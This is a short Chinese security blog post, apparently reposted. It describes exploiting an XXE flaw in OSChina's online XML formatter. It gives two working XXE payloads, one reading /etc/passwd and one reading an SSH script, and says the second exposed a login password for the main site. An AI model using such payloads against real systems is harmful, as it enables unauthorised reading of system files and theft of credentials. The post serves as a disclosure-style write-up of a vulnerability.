好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

从开源中国的某XXE漏洞到主站shell - 网站安全 -

http://tool.oschina.net/codeformat/xml

 

格式化xml,白捡了一个 漏洞 ,输入代码:

 

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd">]> 

 

<root><name>&xxe;</name></root> 

 

直接读取/etc/passwd文件内容。

 

读到/home/run/ssh_go.sh

 

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///home/run/ssh_go.sh">]> 

 

<root><name>&xxe;</name></root> 

 

发现主站登陆ssh的一个用户密码。

 

查看更多关于从开源中国的某XXE漏洞到主站shell - 网站安全 -的详细内容...

  阅读:81次